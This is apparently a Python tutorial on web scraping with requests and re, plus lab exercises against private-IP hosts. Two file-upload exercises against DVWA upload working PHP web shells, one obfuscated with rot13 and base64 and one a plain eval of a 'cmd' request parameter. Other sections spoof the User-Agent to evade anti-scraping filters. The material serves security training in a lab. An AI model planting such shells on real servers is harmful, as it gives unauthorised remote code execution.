Python Web Scraping

Web Scraping

Scraping images breaks down into these sub-problems:

  • Fetch the page content;
  • Extract the image URLs from the page content;
  • Download the images to local disk via those URLs.

Related Modules

The requests Module

Used to fetch the page content.

The requests module mainly simulates browser behavior: it sends HTTP requests and processes HTTP responses.

import requests     # widely regarded as the module closest to how a person operates a browser
# or
'''
import urllib
import urllib2
import urllib3
'''

The basic logic of handling page content with requests (a minimal sketch follows this list):

  • Define a URL;
  • Send an HTTP request;
  • Process the HTTP response.
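
A minimal sketch of the three steps (http://example.com/ is just a placeholder URL):

import requests

url = "http://example.com/"      # 1. define a URL

res = requests.get(url = url)     # 2. send an HTTP request

print(res.status_code)            # 3. process the HTTP response
print(res.text[:200])             #    e.g. look at the first 200 characters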

Request Methods in the Module

Request method | Description
requests.get() | Sends a GET request
requests.post() | Sends a POST request
requests.head() | Returns only the response headers, with no response body
requests.options() | Sends an OPTIONS request
requests.put() | Sends a PUT request
requests.delete() | Sends a DELETE request
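
For instance, a quick sketch of requests.head() against a placeholder URL; the headers come back but the body stays empty:

import requests

res = requests.head("http://example.com/")
print(res.headers)    # response headers are present
print(len(res.text))  # 0: a HEAD response carries no body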

Parameters of the Request Methods

Parameter | Meaning
url | The request URL
headers | Custom request headers
params | GET parameters to send
data | POST parameters to send
timeout | Request timeout (in seconds)
files | File-upload data stream

Attributes of the Response Object

Attribute | Description
response.text | Response body (as text)
response.content | Response body (as bytes)
response.status_code | Response status code
response.url | The URL the request was sent to
response.headers | Response headers
response.request.headers | Request headers
response.cookies | Cookie information
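
A short sketch that exercises these attributes (placeholder URL again):

import requests

res = requests.get("http://example.com/")
print(res.status_code)              # e.g. 200
print(res.url)                      # the URL the request was sent to
print(res.headers["Content-Type"])  # one of the response headers
print(res.request.headers)          # the headers that were sent
print(res.cookies.get_dict())       # cookies as a plain dict (may be empty)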

The re Module

Used to extract the image URLs from the page content.

A regular expression (RE) is a string made of ordinary characters and special symbols that matches, according to a pattern, a whole family of strings sharing similar features. Two questions to answer:

  • Which string to search, and for what content;
  • What the rule is (the pattern).
>>> import re
>>> s = "I say food not Good"
>>> re.findall('ood',s)
['ood', 'ood']
>>> re.findall(r"[fG]ood", s)
['food', 'Good']
>>> re.findall(r"[a-z]ood", s)
['food']
>>> re.findall(r"[A-Z]ood", s)
['Good']
>>> re.findall(r"[0-9a-zA-Z]ood", s)
['food', 'Good']
>>> re.findall(r"[^a-z]ood",s)
['Good']
>>> re.findall('.ood',s)
['food', 'Good']
>>> re.findall(r'food|Good|not',s)
['food', 'not', 'Good']
>>> re.findall(r".o{1,2}.", s)
['food', 'not', 'Good']
>>> re.findall('o*',s)
['', '', '', '', '', '', '', 'oo', '', '', '', 'o', '', '', '', 'oo', '', '']
>>> 

>>> s = "How old are you? I'm 24!"
>>> re.findall(r"[0-9][0-9]", s)
['24']
>>> re.findall(r"[0-9]{1,2}", s)
['24']
>>> re.findall(r"\d{1,2}", s)
['24']
>>> re.findall(r"\w", s)
['H', 'o', 'w', 'o', 'l', 'd', 'a', 'r', 'e', 'y', 'o', 'u', 'I', 'm', '2', '4']
>>> 

>>> s = 'I like google not ggle goooogle and gogle'
>>> re.findall('o+',s)
['oo', 'o', 'oooo', 'o']
>>> re.findall('go+',s)
['goo', 'goooo', 'go']
>>> re.findall('go+gle',s)
['google', 'goooogle', 'gogle']
>>> re.findall('go?gle',s)
['ggle', 'gogle']
>>> re.findall('go{1,2}gle',s)
['google', 'gogle']
>>>

Matching a Single Character

Token | Description
. | Matches any single character except newline; \. matches a literal .
[…x-y…] | Matches any single character in the set
[^…x-y…] | Matches any single character not in the set
\d | Matches any digit; equivalent to [0-9]
\w | Matches any digit, letter, or underscore; equivalent to [0-9a-zA-Z_]
\s | Matches any whitespace character; equivalent to [ \t\n\r\f\v]
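
For example, \s, which is not demonstrated above, matches each whitespace character, and ^ inside a character class negates the set:

>>> import re
>>> re.findall(r"\s", "a b\tc\nd")
[' ', '\t', '\n']
>>> re.findall(r"[^a-z0-9 ]", "How old are you? I'm 24!")
['H', '?', 'I', "'", '!']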

Matching a Group of Characters

Token | Description
string | Matches the literal string
string1|string2 | Matches string1 or string2
* | The preceding character occurs 0 or more times
+ | The preceding character occurs 1 or more times
? | The preceding character occurs 0 or 1 time
{m,n} | The preceding character occurs at least m and at most n times

Other Metacharacters

Token | Description
^ | Matches the start of the string; inside a character class, negates the set
$ | Matches the end of the string
\b | Matches a word boundary, where words consist of \w characters
() | Groups part of the pattern
\number | Matches the previously saved group with that number
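
A few quick examples of these metacharacters with the earlier sample string:

>>> import re
>>> s = "I say food not Good"
>>> re.findall(r"^I", s)
['I']
>>> re.findall(r"ood$", s)
['ood']
>>> re.findall(r"\bnot\b", s)
['not']
>>> re.findall(r"(o)\1", s)    # \1 matches the same text as group 1
['o', 'o']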

Core Functions

Function | Description
re.findall() | Finds all (non-overlapping) occurrences of the pattern in the string; returns a list of matching strings
re.match() | Tries to match the pattern at the start of the string; returns a match object on success, otherwise None
re.search() | Finds the first occurrence of the pattern in the string; returns a match object on success, otherwise None
match.group() | After a successful match() or search(), group() on the returned match object retrieves the matched content
re.finditer() | Same functionality as findall(), but returns an iterator instead of a list; the iterator yields a match object for each match
re.split() | Splits the string into a list on the pattern as delimiter and returns it; strings have a similar method, but regular expressions are more flexible
re.sub() | Replaces every substring that matches the pattern with a new string
re.findall(r"要匹配的字符串",目标字符串)

The pattern string may use any of the tokens described above.

>>> m = re.match('goo','I like google not ggle goooogle and gogle')
>>> type(m)
<class 'NoneType'>
>>> m = re.match('I','I like google not ggle goooogle and gogle')
>>> type(m)
<class 're.Match'>
>>> m.group()
'I'
>>> m = re.search('go{3,}','I like google not ggle goooogle and gogle')
>>> m.group()
'goooo'
>>> m = re.finditer('go*','I like google not ggle goooogle and gogle')
>>> list(m)
[<re.Match object; span=(7, 10), match='goo'>, <re.Match object; span=(10, 11), match='g'>, <re.Match object; span=(18, 19), match='g'>, <re.Match object; span=(19, 20), match='g'>, <re.Match object; span=(23, 28), match='goooo'>, <re.Match object; span=(28, 29), match='g'>, <re.Match object; span=(36, 38), match='go'>, <re.Match object; span=(38, 39), match='g'>]
>>> m = re.split(r'\.|-','hello-world.GJL')
>>> m
['hello', 'world', 'GJL']
>>> s = "hi x.Nice to meet you, x."
>>> s = re.sub('x','GJL',s)
>>> s
'hi GJL.Nice to meet you, GJL.'
>>>

Anti-scraping measures often filter on the User-Agent header, so a custom User-Agent can be supplied.
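
As a quick sketch of why this matters (the exact value depends on the installed requests version), the default User-Agent openly identifies the client as a script, which is easy for a server to filter:

import requests

res = requests.get("http://example.com/")
# without a custom header, requests announces itself, e.g. 'python-requests/2.31.0'
print(res.request.headers["User-Agent"])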


Scraping Page Information

Scraping page images with a Python script:

  • Fetch the page's full source;
  • Filter the image URLs out of the source;
  • Download the images to local disk.

Fetching the Page's HTML Source

Wrap the steps in functions.

# 01 - get_html_source.py

import requests

url = "http://10.4.7.130/pyspider/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def getHtml(url):
    res = requests.get(url = url, headers = headers)

    return res.content


print(getHtml(url = url))

Extracting Image URLs

# 02 - extract_image_urls.py

'''
style/u1257164168471355846fm170s9A36CD0036AA1F0D5E9CC09C0100E0E3w6.jpg
style/u18825255304088225336fm170sC213CF281D23248E7ED6550F0100A0E1w.jpg
style/\w*\.jpg
'''

import requests
import re

url = "http://10.4.7.130/pyspider/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def getHtml(url):
    res = requests.get(url = url, headers = headers)

    return res.content

def getImgPathList(html):
    imgPathList = re.findall(r"style/\w*\.jpg", html)

    return imgPathList

for imgPath in getImgPathList(getHtml(url = url).decode()):
    print(imgPath)

Downloading Images

# 03 - download_image.py

import requests

url = "http://10.4.7.130/pyspider/"
img_path = "style/u401307265719758014fm173s0068CFB1485C3ECA44B8C5E5030090F3w21.jpg"
img_url = url + img_path

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def get_html(url):
    res = requests.get(url = url, headers = headers)

    return res.content

def save_img(img_save_path, img_url):
    with open(img_save_path, "wb") as f:
        f.write(get_html(url = img_url))

save_img("./images/1.jpg", img_url)
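
One caveat: open() does not create missing directories, so ./images/ must exist before save_img() runs. A minimal sketch of creating it up front:

import os

os.makedirs("./images", exist_ok=True)   # create the directory if it does not exist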

Complete Script

# 04 - scrape_web_images.py

import requests
import re
import time

url = "http://10.4.7.130/pyspider/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def get_html(url):
    res = requests.get(url = url, headers = headers)
    return res.content

def get_img_path_list(html):
    img_path_list = re.findall(r"style/\w*\.jpg", html)

    return img_path_list

def img_download(img_save_path, img_url):
    with open(img_save_path, "wb") as f:
        f.write(get_html(url = img_url))

html = get_html(url = url).decode()

img_path_list = get_img_path_list(html = html)

for img_path in img_path_list:
    img_url = url + img_path
    img_save_path = f"./images/{time.time()}.jpg"
    img_download(img_save_path = img_save_path, img_url = img_url)

Image-Scraping Exercise

Source

import requests
import re

# Image markup: <img class="large" src="style/u24020836931378817798fm170s6BA8218A7B2128178FA0A49F010080E2w.jpg">

def html_code(url):
    # send the GET request
    res = requests.get(url=url)
    # decode the binary response body and return it
    html = res.content.decode()
    return html

# regex matching to filter the image URLs; note that \w cannot match "/"
def img_path_list(html):
    # match everything between "style/" and ".jpg" (the dot must be escaped); returns a list of jpg paths
    return re.findall(r"style/\w*\.jpg",html)

def img_request(img_path_list):
    img_list = []
    for img_path in img_path_list:
        # request each image (uses the module-level url) and collect the responses
        img_list.append(requests.get(url+img_path))
    return img_list

def img_download(img,i):
    # the save path must go down to the filename so duplicates don't overwrite; the counter i is appended
    img_save_path = f"./image/{i}.jpg"
    # note: "wb" writes in binary mode
    print(img_save_path)
    with open(img_save_path,"wb") as f:
        f.write(img.content)

url = "http://10.9.47.154/python-spider/"
# 请求该网页的 html 代码
html=html_code(url)
# 获取文件名列表
img_path_list=img_path_list(html)
# 请求图片
imgs = img_request(img_path_list)
# 下载图片
i=0
for img in imgs:
    img_download(img,i)
    i+=1

Result

(Screenshots: the script's output and the downloaded image files.)

Basic Usage of the requests Module

Spoofing the Browser Fingerprint

This helps get past anti-scraping filters.

# 05 - custom_browser_fingerprint.py

import requests

url = "http://10.4.7.130/php/array/get.php"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
}

res = requests.get(url = url, headers = headers)

# print(res.text)
# print(res.status_code)
# print(res.headers)
# print(res.url)
print(res.request.headers)

Sending GET Parameters

# 06 - send_get_params.py

import requests

url = "http://10.4.7.130/php/array/get.php"
# url = "http://10.4.7.130/php/array/get.php?username=GJL&password=123456"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
}

params = {
    "username": "GJL",
    "password": "123456"
}

res = requests.get(url = url, headers = headers, params = params)

print(res.text)

Sending POST Parameters

# 07 - send_post_params.py

import requests

url = "http://10.4.7.130/php/array/post.php"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
}

data = {
    "username": "GJL",
    "password": "123456"
}

res = requests.post(url = url, headers = headers, data = data)

print(res.text)

File Upload

The request headers need both a User-Agent and the Cookie (session) information.

The files parameter:

# form field name of the uploaded file
files = {
    # (filename, binary file content, content type of the upload)
    "uploaded":("filename", b"file content", "content type")
}


# 08 - file_upload.py

import requests

url = "http://10.4.7.130/dvwa_2.0.1/vulnerabilities/upload/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36",
    "Cookie":       "security=low; PHPSESSID=378olurk9upvuo9sspecnl46c2"
}

data = {
    "MAX_FILE_SIZE":    "100000",
    "Upload":           "Upload"
}

files = {
    "uploaded": ("3.php", 
        b"<?php $RIBo=create_function(str_rot13('$').chr(39330/342).chr(0x16a0d/0x343).str_rot13('z').chr(0xcd-0x68),base64_decode('ZQ==').chr(0x364-0x2ee).chr(01333-01172).str_rot13('y').base64_decode('KA==').chr(0xcd-0xa9).chr(0x14695/0x2d7).str_rot13('b').base64_decode('bQ==').chr(0xee4c/0x25c).base64_decode('KQ==').str_rot13(';'));$RIBo(base64_decode('MzAzM'.'DQyO0'.'BldkF'.'sKCRf'.''.chr(37230/438).base64_decode('RQ==').base64_decode('OQ==').str_rot13('G').base64_decode('Vg==').''.''.str_rot13('S').str_rot13('f').chr(0x355-0x322).str_rot13('A').str_rot13('m').''.'ddKTs'.'5MDkx'.'MjY7'.''));?>",
        "image/png")
}

res = requests.post(url = url, headers = headers, data = data, files = files, allow_redirects = False)

print(res.status_code)
print(res.headers)

Server Timeout

# 09 - server_timeout.py

import requests

url = "http://10.4.7.130/php/functions/sleep.php"

def timeout(url):
    try:
        res = requests.get(url = url, timeout = 3)
        return res.text
    except requests.exceptions.ReadTimeout:
        return "timeout"

print(timeout(url))

requests Module Exercises

Spoofing the Browser Fingerprint

# http://10.9.47.154/test.php
import requests

url = "http://10.9.47.154/test.php"
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
}
res = requests.get(url=url,headers=headers)
print(res.request.headers)


GET Request

import requests

url = "http://10.9.47.154/php/arrayprac/get.php"
# the PHP script must read $_GET
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
}
params={
    "name":"GJL",
    "password":"123456"
}
res = requests.get(url=url,headers=headers,params=params)
print(res.text)


POST Request

import requests

url = "http://10.9.47.154/php/arrayprac/post.php"
# the PHP script must read $_POST
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
}
data={
    "name":"GJL",
    "password":"123456"
}
res = requests.post(url=url,headers=headers,data=data)
print(res.text)


File Upload

Upload a file from the browser, intercept the request, and inspect the packet contents:

(Screenshot: the intercepted file-upload request.)

import requests

url = "http://10.9.47.154/dvwa_2.0.1/vulnerabilities/upload/"

headers = {
    # avoid anti-scraping filters
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
    # add the login credential (session cookie) to the request headers
    "Cookie" : "security=low; security=low; PHPSESSID=n25n9pgfgmaplrvl4tfppdt661"
}
data={
    # extra form fields carried in the intercepted request
    "MAX_FILE_SIZE":100000,
    "Upload":"Upload"
}
files={
    # submitted form field name: (uploaded filename, binary file content, content type)
    "uploaded":("1.php",b"<?php @eval($_REQUEST['cmd']);?>","application/octet-stream")
}
# send the constructed request
res = requests.post(url=url,headers=headers,data=data,files=files)

html = res.text
# slice the upload result out of the returned page
start = html.find("<pre>")+5
end = html.find("</pre>")
print(html[start:end])


Timeout

sleep.php is written to sleep for 10 seconds before producing output.

Without a timeout set, the request waits the full 10 seconds and then receives the response.


With a timeout set (3 seconds here), the request raises an error after waiting 3 seconds.


Handling the Exception

Catch the timeout and report it:

import requests
url = "http://10.9.47.154/php/functions/sleep.php"
try:
    res = requests.get(url=url,timeout=3)
except requests.exceptions.ReadTimeout:
    print("Request Time Out")
except:
    print("Something error")
else:
    print(res.text)


Without a timeout set, the request simply blocks until the full response arrives.
